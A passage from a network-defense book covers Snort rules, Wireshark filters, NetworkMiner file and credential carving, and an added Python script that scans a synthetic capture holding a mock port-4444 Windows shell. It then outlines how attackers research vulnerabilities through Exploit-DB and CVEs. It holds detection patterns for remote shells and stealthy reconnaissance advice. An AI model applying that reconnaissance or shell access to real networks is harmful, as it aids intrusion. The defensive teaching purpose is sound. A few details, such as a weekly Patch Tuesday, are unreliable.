[Screenshot: the HxD hex editor showing the first 0x120 bytes of a modified Windows executable. 
The file begins with the MZ header (4D 5A), and the DOS stub text at offset 0x50 has been edited 
to read "This hacker tool ... t be run under W" in place of the normal "This program cannot be 
run in DOS mode" message.] 


212 m Defense against the Black Arts 


A freeware program such as HxD lets you view the hex and ASCII content of a file, in order 
to see the signature and underlying structure. The file above contains an MZ header along with 
a PE header since it is a Windows executable. As an investigator, you can use this to discover 
key characteristics of malware or indicators of what an executable does. Many times hackers 
will modify key characteristics of files in a hex editor to change the signature of their program. 
Remember that changing even 1 bit of the program completely changes its cryptographic hash. In 
the example above, the hacker changed the DOS stub text "This program can't be run under..." to 
"This hacker tool." If a Snort signature was trying to detect on that string, it would no longer 
fire. The MZ and PE bytes, on the other hand, cannot be changed without breaking the executable, 
so signatures on them are more robust than signatures on the stub text. 


Snort 


Snort is an IDS that sniffs and detects on the network in real time. It can also be run against 
capture files after the fact. Snort rules can be written to detect intrusions, from exploitation 
and reconnaissance to malware being transferred over the network. This command runs a packet 
capture through Snort: 


snort -c /etc/snort/snort.conf -r /evidence/capture.cap -l /evidence/ 


-c: Designates the snort.conf file to use (the path varies by distribution; 
/etc/snort/snort.conf is the usual location). 

-r: Designates the capture file to read. 

-l: Designates the directory where the alert and log files are written. 

-y: Includes the year in the timestamps of Snort alerts; this matters when captures span 
multiple years. 


Note: If you don't specify a different log location and run the command multiple times, Snort 
appends to the existing alert file rather than replacing it. 


Snort Rules 


Snort rules live in the /etc/snort/rules directory and contain the rules that Snort alerts 
upon. Many companies produce Snort rule sets to detect the latest malware and intrusion-related 
artifacts. Snort itself ships with community rules, which have been submitted by members of 
the Snort community and are freely available. Also available are the Sourcefire VRT certified 
rules, which have been developed and tested by Sourcefire, the company that created Snort. SRI 
International releases a free 160 day malware Snort rule set at 
http://mtc.sri.com/live data/signatures/. Many network defenders, however, create their own 
Snort rules in order to detect threats known within their network: 


1. Create a hacker.rules file in /etc/snort/rules. 
2. Edit snort.conf, customizing the rule set, and add the line include $RULE_PATH/hacker.rules. 
3. Edit hacker.rules with your own rules. 
Making a Snort Rule 


Snort rules are written on a single line. The alert action tells Snort to alert on a match and 
log the packet. The protocol field ip matches all IP traffic rather than only TCP or user 
datagram protocol (UDP). any any -> any any tells Snort to match any source IP and port to any 
destination IP and port, so the rule runs against every packet on the network or in the capture. 
Lastly, the most important parts of a Snort rule are the content and the message. The content 
is what Snort matches on; the msg, for example "PE Detected", is the text written out when the 
rule fires. Every rule also needs a unique sid (and a rev), or current versions of Snort will 
refuse to load it. A simple rule that matches the PE header bytes is 

alert ip any any -> any any (msg:"PE Detected"; content:"|50 45 00 00|"; sid:1000001; rev:1;) 


Sample Content Fields 


Sample content fields include 


■ content:"exploit.exe"; <- Matches by text. 
■ content:"|50 45 00 00|"; <- Matches by hexadecimal, written between pipe characters. 
■ pcre:"/exploit[0-9]\.exe/"; <- Matches by regular expression (Snort uses the pcre option for this, not content). 


Notice that the content field can match hexadecimal bytes as well as text. This is important 
when detecting a file header signature, such as when file types are being transferred over the 
network. 


Analysis 


Once we have detected malicious alerts and IP addresses/ports, it is a good idea to start looking 
at the packets themselves to figure out what happened in an attack. Wireshark is a network 
protocol analyzer and a great tool for diving deep into packets to find out how a hacker may have 
exploited a network. Wireshark is widely popular and is free/open source, downloadable at 
http://www.wireshark.org. Wireshark can filter and search in a GUI window. However, when 
working with large capture files you may want to pare the data down first with programs such as 
tcpdump or tshark, as captures can become unusable in Wireshark when they exceed a few hundred 
megabytes (the book's rule of thumb is 500 MB). Once the data is pared down, investigators can 
use Wireshark to analyze malicious activity on the network and even spot command and control 
traffic. Wireshark is one of the primary investigative tools of network defenders. 


Capture Information 


When working with a capture file, sometimes it’s important to look at the capture beforehand to 
see the size of the capture file and to determine how many packets are in the capture. 
Capinfos 


Using capinfos (shipped with Wireshark) gives you the file type, number of packets, file size, 
and capture duration. The most important pieces of information are the start and end times. 
These let you confirm that the capture covers the window in which the incident or intrusion may 
have occurred. 


root@bt:~# capinfos capture.cap 
File name:           capture.cap 
File type:           Wireshark/tcpdump/... - libpcap 
File encapsulation:  Ethernet 
Number of packets:   2480 
File size:           1412513 bytes 
Data size:           1372809 bytes 
Capture duration:    94.450190 seconds 
Start time:          Thu Nov 11 09:31:51 2010 
End time:            Thu Nov 11 09:33:25 2010 
Data rate:           14534.74 bytes/s 
Data rate:           116277.92 bits/s 
Average packet size: 553.55 bytes 


Setting Up Wireshark 


When using Wireshark for investigative purposes, it's important to set the time format and 
disable name resolution. This gives you a consistent date and time to match incidents against, 
and it keeps Wireshark from sending DNS lookups for an attacker's addresses or labeling traffic 
by the usual protocol of a port. Remember, just because port 443 is in use does not necessarily 
mean the traffic is HTTPS. Therefore, we only want to see the port numbers. 


■ Fix date and time: View > Time Display Format > Date and Time of Day. 
■ Disable name resolution: View > Name Resolution > uncheck "Enable for MAC Layer", 
"Enable for Network Layer", and "Enable for Transport Layer" (media access control, network, 
and transport layer names). 


Coloring Rules 


Wireshark lets you color specific traffic whenever it matches a filter in a packet capture. This 
can be a very useful tool for spotting malicious actions or even new connections. It is found 
under View > Coloring Rules, where you will see the default list of coloring rules that ships 
with Wireshark. It is recommended that you clear them by highlighting them all and clicking 
Delete, then set up your own depending on what you are looking for. If for any reason you want 
to restore the Wireshark default coloring rules, click Clear in this window. 
[Screenshot: Wireshark Coloring Rules dialog (Profile: Default) listing the default rules, 
including the filters (ip.dst == 224.0.0.0/4 && ip.ttl < 5 && !pim), smb || nbss || nbns || 
nbipx || ipxsap || netbios, http || tcp.port == 80, and ipx || spx.] 
In the example, a rule for TCP SYN+ACK was added in order to color every new TCP connection. 
In a TCP three-way handshake, the SYN+ACK is the server's reply to the client's SYN, so it is a 
good indicator to color because it shows a new connection being established between two hosts. 
To color TCP SYN+ACK: 


1. Go to Coloring Rules. 

2. Click New. 

3. Add the filter tcp.flags.syn == 1 && tcp.flags.ack == 1. 
4. Click Up and make it first in the order, since Wireshark applies the first matching rule. 


Filtering Data in Wireshark 


The power of Wireshark lies in its ability to filter packets to find relevant data. Wireshark 
has hundreds of filter fields available; click the Expression button next to the filter box to 
browse them. Once a display filter has been entered, Wireshark only shows packets matching it. 
This can be used to look only at IP address combinations, an executable, or even particular 
application layer fields. 


Wireshark Important Filters 


■ ip.addr == 192.168.1.2 <- Matches packets with 192.168.1.2 as source or destination. 

■ tcp.port == 4444 <- Matches TCP port 4444 as source or destination. 

■ udp.port == 4444 <- Matches UDP port 4444 as source or destination. 

■ tcp.flags.syn == 1 and tcp.flags.ack == 1 <- Matches SYN+ACK packets, i.e., new TCP connections being accepted. 
■ frame contains 50:45:00:00 <- Matches frames containing the PE header bytes. 

■ frame contains "Microsoft Windows" <- Matches the banner a Windows command shell prints, a sign of a remote CMD shell. 
Wireshark Operators 


■ && <- Logical AND, combines filter AND filter. 
■ || <- Logical OR, combines filter OR filter. 
■ ! <- Logical NOT, excludes packets matching a filter. 


Wireshark Filters 


In the example below, the display filter ip.addr == 192.168.22.130 && tcp.port == 4444 looks 
for IP address 192.168.22.130 and TCP port 4444. This would be useful if, say, we had figured 
out that malware was beaconing over port 4444 and had compromised this IP address. We might 
then find other indicators of compromise and what the attacker went on to do to the host over 
the network. 


[Screenshot: Wireshark main window for exploit.cap with the display filter 
ip.addr == 192.168.22.130 && tcp.port == 4444 applied. The packet list shows a TCP conversation 
between 192.168.22.130 and 192.168.22.133 on port 4444 (labeled krb524 by transport name 
resolution) with [ACK] and [PSH, ACK] segments; the details pane shows Destination port: 
krb524 (4444), [Stream index: 1], Sequence number: 0 (relative sequence number); the status 
bar reads Packets: 79 Displayed: 14 Marked: 0.] 


As you can see, Wireshark has three main panes that display information about the packet 
capture. The top pane lists all the packets in the capture; as filters are entered it displays 
only packets matching the filter. 

The middle pane shows the structure of the selected packet layer by layer: the frame, Ethernet, 
IP, the transport layer, and finally the application data, decoded according to the protocol in 
use, such as HTTP. If you expand this section and look at a field, you can right-click it to 
filter on its value. This is extremely useful when the investigator is not sure what filter to 
write. Lastly, the bottom pane contains the raw bytes of the packet in hexadecimal and ASCII. 
This is useful when trying to determine what data was sent over the network between the hacker 
and the victim. Also, you can search through all displayed traffic by pressing Ctrl-F or going 
to Edit > Find Packet, which lets you search by display filter, hex value, or string. 


[Screenshot: Wireshark Find Packet dialog, with By: Display filter / Hex value / String; Search 
In: Packet list / Packet details / Packet bytes; String Options: Case sensitive, Character set 
(Unicode & Non-Unicode); and Direction: Up / Down.] 


For instance, this lets us search for an MZ header through the traffic currently displayed. 
This is useful if you don't want to filter the traffic down and would rather leave all the 
packets displayed on the screen. 


Packet Options 


By clicking on a packet in the upper pane, you have a number of options available to aid in an 
investigation of an attack. 


Right-click menu for a packet in the packet list: 

Mark Packet (toggle) 
Ignore Packet (toggle) 
Set Time Reference (toggle) 
Manually Resolve Address 
Apply as Filter 
Prepare a Filter 
Conversation Filter 
Colorize Conversation 
SCTP 
Follow TCP Stream 
Follow UDP Stream 
Follow SSL Stream 
Copy 
Decode As... 
Print... 
Show Packet in New Window 


Notice that we have the option to show the packet in a new window; we can apply additional 
filters or colorization rules as needed; we can mark packets (this highlights the packet in 
black, useful for ones worth coming back to later); and, most importantly, we can follow a TCP 
stream. Apply as Filter is very useful when you have a packet similar to what you are looking 
for but don't know how to write the appropriate filter. Manually Resolve Address lets you assign 
a name to an IP address if needed. This is useful if you get confused by addresses and just want 
to label one "hacker." 
Following the Stream 


Following a stream lets us look at all the data sent and received in an individual TCP or UDP 
session, which may span anywhere from a few packets to many thousands. 


Follow TCP Stream 


Microsoft Windows [Version 5.2.3790] 
(C) Copyright 1985-2003 Microsoft Corp. 

C:\WINDOWS\system32> 


In this example, following the TCP stream let us view the command and control of this server. 
As you can see, the compromised server is presenting a standard Windows command shell to the 
attacker over the network. As long as this communication is in cleartext it will be readable, 
and very useful to an investigation. As the hacker issues new commands to the server they will 
also appear, either in this stream or in others. Remember that the hacker will try to seed as 
many different command and control channels as possible, because he wants to avoid detection 
and the loss of his connections. Therefore, investigators should examine as many TCP streams as 
possible in order to find out everything that is being done to the system. 


Wireshark Statistics 


The Statistics menu gives detailed net flow style information for analysis. One important item 
is Statistics > Conversations. This outlines the IP addresses involved in the packet capture; 
you can see the conversations between pairs of addresses and how many packets and bytes were 
transmitted in each direction. This is especially important in a network investigation. 
Indicators that might be malicious include many internal hosts connecting to the same external 
IP address, and an internal host sending more bytes out than it receives. The latter is a common 
indicator of exfiltration, because on a typical network your hosts almost always download more 
than they upload to the outside. Therefore, if you see a jump in bytes going out to an unknown 
IP address, it could be an exfiltration attempt of databases, documents, pictures, or more. 


IPv4 Conversations (Statistics > Conversations, IPv4 tab): 

Address A        Address B        Packets  Bytes  Packets A->B  Bytes A->B  Packets A<-B  Bytes A<-B 
192.168.22.1     192.168.22.255   15       1947   15            1947        0             0 
192.168.22.130   192.168.22.133   29       4911   17            3610        12            1301 
192.168.22.133   192.168.22.254   2        693    1             351         1             342 
192.168.2.2      192.168.22.133   20       1723   10            952         10            771 
192.168.22.1     224.0.0.251      5        365    5             365         0             0 
192.168.22.133   192.175.48.1     2        224    1             164         1             60 
In this example we can see the communication with the outside, external address 192.175.48.1, 
and that the most packets were exchanged between 192.168.22.130 and 192.168.22.133. Notice that 
you can see how many bytes were transferred in each direction between each pair of hosts. 
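As an added example (not code from the book), the following Python script performs three of the steps above on a small capture that it builds in memory, so it runs without tcpdump or Wireshark: the BPF-style host/port pare-down from the Filtering section, the search for the MZ, DOS stub and PE\0\0 signatures from the Windows Executable and Signatures section, and a Statistics > Conversations style per-direction packet and byte count. The addresses, ports and the fake executable are constructed for the example, and the script writes the libpcap format itself. It also demonstrates the caveat noted with ngrep: a per-packet search (what ngrep and a plain Snort content match see) misses a signature split across two TCP segments, while a search over the reassembled stream finds it.

```python
"""Added example (not from the book): a tiny libpcap reader that runs the
chapter's workflow on a capture built in memory: BPF-style 'host X and port Y'
filtering, a Statistics > Conversations style count, and MZ / DOS stub / PE
signature search per packet and per reassembled TCP stream. Addresses, ports
and the fake executable are all constructed for the example."""
import struct
from collections import defaultdict, namedtuple

Packet = namedtuple("Packet", "src dst sport dport seq length payload")
SIGNATURES = {"MZ": b"MZ", "PE": b"PE\x00\x00",          # from the chapter
              "DOS stub": b"This program cannot be run in DOS mode"}

def build_frame(src, dst, sport, dport, seq, payload):
    """Ethernet/IPv4/TCP frame; checksums are left zero (the parser ignores them)."""
    ip4 = lambda a: bytes(int(x) for x in a.split("."))
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, 64, 6, 0,
                     ip4(src), ip4(dst)) + tcp
    return b"\x00" * 12 + b"\x08\x00" + ip          # dst MAC, src MAC, EtherType IPv4

def build_pcap(frames, ts=1289467911):
    """libpcap file: little-endian global header (EN10MB, snaplen 65535) + records."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, 1)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", ts + i, 0, len(f), len(f)) + f
    return out

def parse_pcap(data):
    """Return the IPv4/TCP packets in a pcap file; everything else is skipped."""
    e = "<" if data[:4] == b"\xd4\xc3\xb2\xa1" else ">"
    off, pkts = 24, []
    while off + 16 <= len(data):
        _, _, incl, _ = struct.unpack(e + "IIII", data[off:off + 16])
        frame = data[off + 16:off + 16 + incl]
        off += 16 + incl
        if frame[12:14] != b"\x08\x00":           # EtherType is not IPv4
            continue
        ip = frame[14:]
        ihl, total, proto = (ip[0] & 0xF) * 4, struct.unpack("!H", ip[2:4])[0], ip[9]
        if proto != 6:                            # TCP only in this example
            continue
        src, dst = ".".join(map(str, ip[12:16])), ".".join(map(str, ip[16:20]))
        tcp = ip[ihl:total]
        sport, dport, seq = struct.unpack("!HHI", tcp[:8])
        payload = tcp[(tcp[12] >> 4) * 4:]        # skip the TCP header (data offset)
        pkts.append(Packet(src, dst, sport, dport, seq, len(frame), payload))
    return pkts

def bpf_filter(pkts, host=None, port=None):
    """Same selection as the tcpdump expression 'host HOST and port PORT'."""
    return [p for p in pkts if (host is None or host in (p.src, p.dst))
            and (port is None or port in (p.sport, p.dport))]

def conversations(pkts):
    """{(A, B): [pkts A->B, bytes A->B, pkts A<-B, bytes A<-B]} with A < B."""
    table = defaultdict(lambda: [0, 0, 0, 0])
    for p in pkts:
        a, b = sorted((p.src, p.dst))
        i = 0 if p.src == a else 2
        table[(a, b)][i] += 1
        table[(a, b)][i + 1] += p.length
    return dict(table)

def reassemble_tcp(pkts):
    """Naive one-direction reassembly: payloads concatenated in sequence order."""
    streams = defaultdict(list)
    for p in pkts:
        if p.payload:
            streams[(p.src, p.sport, p.dst, p.dport)].append((p.seq, p.payload))
    return {k: b"".join(pl for _, pl in sorted(v)) for k, v in streams.items()}

def search_signatures(blob):
    """Names of the chapter's signatures present in a byte string."""
    return {name for name, sig in SIGNATURES.items() if sig in blob}

def scan(pcap_bytes, host=None, port=None):
    """Filter, then search per packet (ngrep view) and per reassembled stream."""
    pkts = bpf_filter(parse_pcap(pcap_bytes), host, port)
    per_packet = set().union(*(search_signatures(p.payload) for p in pkts))
    per_stream = set().union(*(search_signatures(s) for s in reassemble_tcp(pkts).values()))
    return pkts, per_packet, per_stream

def sample_capture():
    """Constructed traffic: an executable fetched over port 80 whose PE signature
    is split across two TCP segments, plus a Windows shell beaconing on port 4444."""
    fake_exe = (b"MZ" + b"\x90" * 60 + b"This program cannot be run in DOS mode.\r\n$"
                + b"\x00" * 20 + b"PE\x00\x00\x4c\x01" + b"\x00" * 40)
    cut = fake_exe.index(b"PE") + 2               # boundary falls inside "PE\0\0"
    victim, web, attacker = "192.168.22.133", "10.1.1.1", "192.168.22.130"
    http_ok = b"HTTP/1.1 200 OK\r\n\r\n"
    shell = b"Microsoft Windows [Version 5.2.3790]\r\n\r\nC:\\WINDOWS\\system32>"
    return build_pcap([
        build_frame(victim, web, 49152, 80, 1, b"GET /update.exe HTTP/1.1\r\nHost: 10.1.1.1\r\n\r\n"),
        build_frame(web, victim, 80, 49152, 1, http_ok + fake_exe[:cut]),
        build_frame(web, victim, 80, 49152, 1 + len(http_ok) + cut, fake_exe[cut:]),
        build_frame(victim, attacker, 51318, 4444, 1, shell),
        build_frame(attacker, victim, 4444, 51318, 1, b"dir\r\n"),
    ])

if __name__ == "__main__":
    cap = sample_capture()
    pkts, per_packet, per_stream = scan(cap, host="10.1.1.1", port=80)
    print(len(pkts), "packets; per packet:", sorted(per_packet), "per stream:", sorted(per_stream))
    for pair, (pa, ba, pb, bb) in conversations(parse_pcap(cap)).items():
        print(pair, f"A->B {pa} pkts/{ba} B, A<-B {pb} pkts/{bb} B")
```

Running it shows that MZ and the DOS stub are found per packet but PE\0\0 only appears once the stream is reassembled, and the conversation table shows the web server sending more bytes to the victim than it receives, as a download should. On real captures, use a proper reassembly (Wireshark's Follow TCP Stream or Snort's stream preprocessor) rather than this naive concatenation, which ignores retransmissions and overlapping segments.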


Network Extraction 


Sometimes investigators will want to mine traffic for files in order to see what is being sent 
over the network and to recover various artifacts. NetworkMiner allows real-time packet sniffing 
and analysis of network traffic and can also process saved packet captures. NetworkMiner 
identifies the hosts in the communication, the frames, and, most importantly, all the files 
involved in the transmission, whether executable or image, and automatically carves them out of 
the traffic. This tool can be very useful for network defenders trying to figure out what 
happened on the network. NetworkMiner is freely available at 
http://networkminer.sourceforge.net/. It extracts the following: 


DNS: A list of all domain name queries and answers seen. 

Hosts: All hosts involved in the packet capture. 
Parameters: Parsed application level parameters, such as HTTP query strings and cookies. 
Frames: Frame information. 

Files: Files carved out of application layer file transfers. 
Images: Images parsed out of the network traffic. 
Messages: Messages from chat protocols such as AIM. 
Keywords: Keyword searching through the traffic. 
Cleartext: Cleartext strings found in the traffic. 

Credentials: Any user authentication credentials sent over the network. 
Sessions: All sessions in the traffic. 


[Screenshot: NetworkMiner Hosts tab, sniffing on the VMware adapter at 192.168.22.133. Tab 
counts: Hosts (31), Files (158), Images (110), Credentials (12), Sessions (10446), DNS (22), 
Parameters (899). The expanded host entry shows TTL 128 (distance: 0), open TCP ports, packets 
and bytes sent and received, 2 incoming and 105 outgoing sessions, and other hosts listed with 
resolved names such as content.yieldmanager.com and b.scorecardresearch.com and a detected 
operating system.] 
In this screenshot, the Hosts tab identifies all the hosts involved in the communication on the 
network. You can identify the IP address, the MAC address, the hostname, and even the operating 
system (fingerprinted from the traffic, so treat it as a guess). Additionally you can see the 
sessions each host was involved in and the TCP ports used. This is very valuable information for 
a network investigator trying to pick out malicious traffic in a capture. 


[Screenshot: NetworkMiner Files tab listing the carved files by name and type, including an 
mc.exe download, several ads and search HTML pages, a number of JavaScript files (urchin.js, 
google_ads.js, show_ads.js, render_ads.js, expansion_embed.js) and JPEG image ads.] 

Additionally, NetworkMiner extracts and carves files out of the application data in the 
network traffic and records the file name used and the protocol it was sent over. From here you 
can right-click and open the file, or its folder, to view it. This is important from a network 
defense standpoint because the investigator can look at the actual malware transferred over the 
network in order to figure out how a system was compromised. It is also important to note that 
all the carved files are stored on disk under \NetworkMiner-0.92\AssembledFiles, sorted by IP 
address. 


Note: This folder can vary depending on your version of NetworkMiner. Treat its contents as 
hostile; the carved files are the malware itself, so never open them directly on the analysis machine. 


[Screenshot: NetworkMiner DNS tab, with columns for the DNS server, client, query and answer. 
The answers listed include addresses such as 72.14.204.101, 64.233.169.165, 98.136.154.147, 
208.29.69.138 and 208.201.239.51.] 
The DNS tab of NetworkMiner contains every DNS query seen on the network along with its 
answer. This is extremely important to an investigator, because generally when a hacker 
compromises a system he places malware on it that lets the computer be commanded and controlled. 
That command and control beacons back to wherever it is controlled from, and the beacon must 
either resolve a domain name or connect directly to an IP address. Therefore, the DNS tab makes 
it easy to see possible clues to where malware is beaconing. 


[Screenshot: NetworkMiner Credentials tab, showing extracted HTTP cookies such as a Google 
PREF=ID=410ed28228ffc... cookie.] 


The Credentials tab of NetworkMiner can be another important part of an investigation. 
Investigators can see all credentials passed over the network, whether that is the hacker 
logging onto an FTP server or HTTP cookies being passed. Therefore, if some type of compromise 
has occurred on the system, you can possibly see the invalid access attempts. If the username 
and/or password were submitted in cleartext you can view them in full. 

There is not much the hacker can do to defend against the capturing and investigation of 
network traffic, and this is one of the network defender's and investigator's greatest assets 
in solving an attack. Encrypting the channel hides the contents from these tools, but the 
connection itself, its timing, its volume, and the DNS lookups that preceded it are still there 
to be analyzed. 


Summary 


From this chapter, remember network defenders collect network traffic across the wire in order to 
identify intrusions into the network, and solve the who, what, why, and how of an attack that has 
occurred. Therefore, network traffic is invaluable to network investigators/defenders as they will 
perform monitoring using programs like tcpdump, try to detect intrusions using Snort, filter that 
data down to the detected affected IP addresses, search for relevant artifacts using gawk, egrep, 
and ngrep, and then start performing analysis with tools such as Wireshark and Network Miner. 
Network captures are a very valuable asset for network defense. 


Chapter 9 


Research Time: Finding 
the Vulnerabilities 


Overview 


In this chapter we further the research process and focus on more direct methods for gathering 
intelligence on targets. Once the hacker has exhausted all indirect intelligence gathering 
methods, he will move on to more direct methods in order to obtain the information needed 
to penetrate the network or system. The hacker must find a vulnerability in order to 
exploit a target. Therefore, as part of the hacker's research, one of his primary goals is to find 
vulnerabilities within the information system. A vulnerability is essentially a weakness, and an exploit is 
what is used to take advantage of a vulnerability. Hackers use exploits in order to break into the system 
and then use that access to be malicious, such as creating a backdoor into the system, 
performing a denial of service attack, adding users to the system, or even deleting data. Regardless, 
the hacker must understand and target the vulnerabilities present in order to exploit the system. 

Remember, at all times during indirect and direct scanning the attacker’s primary job is to find 
vulnerabilities to exploit against all systems that have access to the information that is being targeted. 
Also, remember that hackers have all of the time in the world, so many times their scanning tech- 
niques are going to be stealthy to prevent alerting anyone to his/her presence. 


Methodology 


When hackers are trying to gather research, they typically follow a loose methodology in order to 
exploit a system, as shown in Figure 9.1. 


■ Identifying hosts: Obviously hackers are going to have to identify a range of Internet 
protocol (IP) subnets, whether internal to the network using private address ranges or external 
address ranges, to identify hosts to target. Moreover, specific address ranges will be found 
from the indirect scanning techniques. In direct research scanning the hacker is trying to 
find vulnerabilities in that range. 
Figure 9.1 Research methodology: Identifying Hosts → Identifying Services → Identifying Versions → Identifying Vulnerabilities. 


■ Identifying services: Once hosts are identified and possibly targeted, the hacker needs to 
determine what services are being run on these hosts to possibly exploit. For instance, if port 
80 is open, that is typical of a web server, and if port 22 is open that is typical of 
secure shell (SSH). Further, as the hacker identifies versions, he can tell whether it is a Windows 
system or a Linux system running the web server, which in most cases means either Internet 
Information Services (IIS) or Apache is running. 

■ Identifying versions: Once these services have been identified, they have to be 
researched so that their versions can be identified in order to find vulnerabilities and to develop 
target shellcode for the exploit. Generally, many exploits succeed because many information 
technology (IT) shops out there don't update or patch their systems. Even for the shops 
that do update, many times in an enterprise a patch is released for a 
vulnerability that has been publicly identified, but there is a testing period before the 
update is rolled out across the enterprise because the update could break a lot of 
clients/servers. Consequently, this window is a prime time frame for an attacker to attack a network; 
it is one reason why many viruses spread so fast throughout a network, because sufficient 
patching has not occurred. 

■ Identifying vulnerabilities: Once the service and version have been identified, the hacker 
then tries to tie this information back to the operating system version to target his exploit. 
Some vulnerabilities only work with certain versions of the application or operating system. 
Therefore, it is important for him to have this information. Also, two operating systems, such 
as Windows 2008 and Windows Vista, may both be vulnerable but might show very different 
results from the same exploit. 


In conclusion, remember that the hacker is going to identify hosts that are on a network, he is 
going to identify the services running on those hosts, he's then going to identify the versions of 
those services on those hosts, and then he is going to try and find vulnerabilities that will allow 
him to get access into the system. 


Stealth 


If a hacker is probing the network more directly, there is a much higher probability 
of leaving artifacts that can be traced back to him and attributed to him. Therefore, the attacker is 
going to want to be as stealthy as possible using the tools that he has at hand, or at least to use IP 
addresses and sources that are not directly attributable to him. The hacker will definitely be using 
the options in these tools that minimize his digital footprint. 
Offensive Security's Exploit Database 


Once again it’s important for the attacker to find vulnerabilities associated with the operating 
system that he is targeting and the specific service version numbers that are running. The website 
http://www.exploit-db.com, which was created by Offensive Security, the makers of BackTrack, 
contains many exploits that are available. It’s used as a resource for hackers and penetration testers 
to create a one-stop shop to store and provide research for various exploits against varying soft- 
ware programs. Therefore, when researching exploits against a given operating system and version, 
hackers will want to query/use their Exploit Database as a resource to tailor their exploits. 


[Screenshot: the Local Exploits listing at http://www.exploit-db.com/local/, showing entries by date and description from October 2010.]

The search function allows you to search for various criteria such as description, a port, or an 
open source vulnerability database (OSVDB) or common vulnerabilities and exposures (CVEs) 
number assigned to a vulnerability. 


[Screenshot: the Exploit Database search form, with fields for an OSVDB number and a CVE number (e.g., 2010-2204).]
CVEs 


As mentioned just above, the Exploit Database website allows you to search for CVEs or through 
the OSVDB. CVEs are publicly known information security vulnerabilities or exposures. Basically, a 
hacker performing security research discovers a potential security vulnerability or exposure. The 
vulnerability information and, if applicable, a proof of concept exploit, is then submitted to a candidate 
naming authority (CAN), where they research the vulnerability and assign it a number if it checks out. 
This number allows vulnerability databases to be linked together to compare security exploits, tools, 
scanners, and so on. One of the interesting things is that the CAN is made up of very well-known 
software vendors (normally the individuals issuing the patches) and computer emergency response 
teams (CERTs). Once these exploits are discovered they are then submitted to the various software 
vendors so they can develop patches to thwart these vulnerabilities. The CVEs are a way to coordinate 
between all of the security vendors out there. Every week Microsoft releases a patch on "Patch Tuesday" 
that resolves issues with Microsoft programs. These are based on known vulnerabilities that have been 
patched, and Microsoft issues them under a Microsoft (MS) number. Typically you will see "MS10-071 
Security Update for Internet Explorer." The 10 corresponds to the year and the -071 is the update 
number. Notice these updates span many CVEs and typically fix multiple vulnerabilities in one update. 


Security Bulletins 


The descriptions of the various vulnerabilities can be found on Microsoft's website. Here is an 
example link: 
http://www.microsoft.com/technet/security/bulletin/ms10-071.mspx 


[Screenshot: Microsoft Security Bulletin MS10-071 - Critical: Cumulative Security Update for Internet Explorer (2360131), published October 12, 2010, version 1.1. Its Vulnerability Information section lists:]

■ AutoComplete Information Disclosure Vulnerability - CVE-2010-0808 
■ HTML Sanitization Vulnerability - CVE-2010-3243 
■ HTML Sanitization Vulnerability - CVE-2010-3324 
■ CSS Special Character Information Disclosure Vulnerability - CVE-2010-3325 
■ Uninitialized Memory Corruption Vulnerability - CVE-2010-3326 
■ Anchor Element Information Disclosure Vulnerability - CVE-2010-3327 
■ Uninitialized Memory Corruption Vulnerability - CVE-2010-3328 
■ Uninitialized Memory Corruption Vulnerability - CVE-2010-3329 
■ Cross-Domain Information Disclosure Vulnerability - CVE-2010-3330 
■ Uninitialized Memory Corruption Vulnerability - CVE-2010-3331 

As you can see in the example, this one patch fixes all of these publicly known CVEs. 
Zero Day Exploits 


The only way to obtain a CVE is to contact the people responsible for maintaining CVEs, or post 
the information to BugTraq or another analysis team. Many malicious hackers never submit their 
exploits, and these exploits do not get assigned a number (as this is what security researchers and 
penetration testers do); these are known as "zero day" exploits, meaning that they are undisclosed. 
These are the most dangerous types of attacks to the network, and also the most difficult to defend 
against from a network defender's point of view, as developers have had zero opportunity to develop 
patches to their software. So, network defenders pretty much don't know what they are up against. 
The most successful and advanced hackers are the ones developing new exploits and discovering 
new vulnerabilities. Normally, when these zero day attacks are discovered, it is already too late. For 
more information visit http://cve.mitre.org/. 


[Screenshot: the CVE Numbering Authorities page at http://cve.mitre.org/cve/cna.html, listing the organizations participating as CNAs as of June 2010. Primary CNA: MITRE Corporation (cve@mitre.org). Software vendors, each for its own issues only: Apple, Adobe Systems Incorporated, Hewlett-Packard, Oracle, Cisco Systems, Inc., Red Hat, Inc. (Linux issues), Debian GNU/Linux (Linux issues), FreeBSD, Ubuntu Linux (Linux issues), Microsoft Corporation, and Silicon Graphics, Inc. Third-party coordinators: CERT/CC and JPCERT/CC.]

Security Focus 


Security Focus (www.securityfocus.com) is a cyber security web portal that allows hackers or 
computer security researchers to research exploits and vulnerabilities of various software programs. 
Security Focus also maintains BugTraq, which is a popular mailing list among cyber security 
professionals and features cyber security issues dealing with exploitation and penetration testing. 
Security Focus also allows the hacker to search based upon CVEs. 
[Screenshot: the SecurityFocus home page (http://www.securityfocus.com/), listing recent vulnerabilities dated 2010-10-29: Linux Kernel 'video4linux' IOCTL and IP Multicast 'getsockopt' vulnerabilities, Pidgin 'libpurple' multiple denial of service vulnerabilities (http://www.securityfocus.com/bid/44283), Adobe Shockwave Player 'dirapi.dll' CVE-2010-3655 and 'SetVertexArray()' CVE-2010-4090, and the Multiple Vendor TLS Protocol Session Renegotiation Security Vulnerability (http://www.securityfocus.com/bid/36935), with a "Search all vulnerabilities" link.]
One of the things hackers do is find vulnerabilities out in the wild for which exploits are available, or they 
modify an existing proof of concept in order to exploit it further themselves. In the next 
screenshot you see a Microsoft Windows print spooler service vulnerability, which is present 
even in the most recent versions of Windows. If you go over to the exploit tab, it gives you an existing 
proof of concept that allows the hacker to exploit this vulnerability, much like Exploit Database 
(www.exploit-db.com), which is run by Offensive Security. 


[Screenshot: the SecurityFocus entry "Microsoft Windows Print Spooler Service Remote Code Execution Vulnerability" (tabs: info, discussion, exploit, solution, references). The exploit tab notes that Microsoft reports limited in-the-wild exploitation, that a working commercial exploit is available through VUPEN Security's Exploit and PoCs Service, and that the following exploit code is available: /data/vulnerabilities/exploits/43073.rb]


Notice that this proof of concept is a Ruby script, which exploits the MS10-061 vulnerability. 
Notice also that the shellcode shows that this is an exploit used as part of the Metasploit 
framework. Metasploit will be explained fully in Chapter 10. If a hacker designs an exploit, he will 
need to run it with its associated language and dependencies or compile it from source, and then it 
will work. 
[Screenshot: http://downloads.securityfocus.com/vulnerabilities/exploits/43073.rb, the beginning of the Metasploit module]

    ##
